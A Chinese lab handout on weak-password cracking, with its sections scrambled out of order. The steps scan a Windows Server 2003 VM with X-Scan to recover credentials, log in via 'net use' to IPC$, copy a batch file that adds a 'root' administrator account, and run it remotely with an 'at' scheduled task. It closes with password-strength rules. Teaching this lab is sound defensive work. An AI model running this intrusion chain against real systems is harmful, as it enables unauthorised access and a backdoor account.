当前位置:文档之家› 弱口令破解实验

弱口令破解实验

图2
图3
图4 3. 执行 X-Scan-v3.3-cn 对 Windows Server 2003 进行账户扫描如图 5,得到用
户名和密码如图 6
图5
图6
4. 输入命令 net use \\服务端 ip\ipc$ “123456” /user:”administrator”,如下图 7 示。
图7
5. 口令中不应包含本人、父母、子女和配偶的姓名和出生日期、纪念日期、登录名、E-mail 地址等等与本人有关的信息,以及字典中的单词。
6. 口令不应该为用数字或符号代替某些字母的单词,例如:Pas$W0rd。 7. 口令应该易记且可以快速输入,防止他人从你身后很容易看到你的输入。 8. 至少 90 天内更换一次口令,防止未被发现的入侵者继续使用该口令。同时,有很多行
3. 口令不应该为连续的某个字符(例如:A 口令应该为以下四类字符的组合,大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字 符(!@#$%^&*()-_=+\|[]{};:'"<>,.?/~`),每类字符至少包含一个。如果某类字符只包含一 个,那么该字符不应为首字符或尾字符。
5. 输入命令 copy 1.bat \\服务端 ip\c$, 复制 1.bat 到服务器 c 盘。1.bat 为添 加用户并提升为管理员的批处理程序,可右键编辑查看此文件内容,如图 8
图8 注:文件 1.bat 内容如下: @echo off net user root 123456 /add net localgroup administrators root /add 意思是添加一个用户名为 root,密码为 123456 的用户,并提升为管理员。
弱口令破解
场景
弱口令通常认为容易被别人猜测到或被破解工具破解的口令均为弱口令,比如常用的英 文单词,生日数字等。
目前的字典档攻击、枚举攻击等可以轻而易举的破解弱口令。如果你使用弱口令,就像 把密码放在键盘下面的纸片上,是非常危险的。
实验目标
掌握弱口令猜解的基本流程 理解安全口令组成的要素 具有能够对系统设定复杂的密码的安全意识
实验拓扑
VM Server
VM Client
实验环境 [实验必备环境]
Server:Windows Server 2003 Client:WindowsXP X-Scan-v3.3-cn 扫描工具
[服务端] [客户端] [工具] [其他所需设备,例如防火墙、IDS 等]
实验过程指导 [实验完成步骤,力求完整]
8. 切换至服务器桌面。 9. 在桌面,右击“我的电脑”,在弹出的对话窗选择“管理 10. 弹出计算机管理的对话框,单击左边“本地用户和组”,然后单击下面用户,
可以看到,用户“root”,已经成功添加,如图 11
图 11
如何防止弱口令
1. 不使用空口令或系统缺省的口令,因为这些口令众所周之,为典型的弱口令。 2. 口令长度不小于 8 个字符。
为也会使口令被泄漏。
6. 输入命令 net time \\服务端 ip 看服务器时间,如图 9 示
图9
7. 输入命令 at \\服务段 ip 03:05 c:/1.bat,此条命令是添加一条任务,在服务 器时间 03:05 分运行程序 1.bat,如图 10 所示
图 10 注:此事件一定要比服务器时间快,不然无法启动。 此时稍等片刻。
1. 启动 Windows Server 2003 服务器 使用服务器管理员 Administrator,密码:123456 进行登录 更改 WindowsServer2003 服务器上的 Server 服务启动类型为手动,并启
动如图 1
图1 2. 在客户端安装 X-Scan-v3.3-cn 扫描工具,并且设定扫描模块如图 2 到 4
相关主题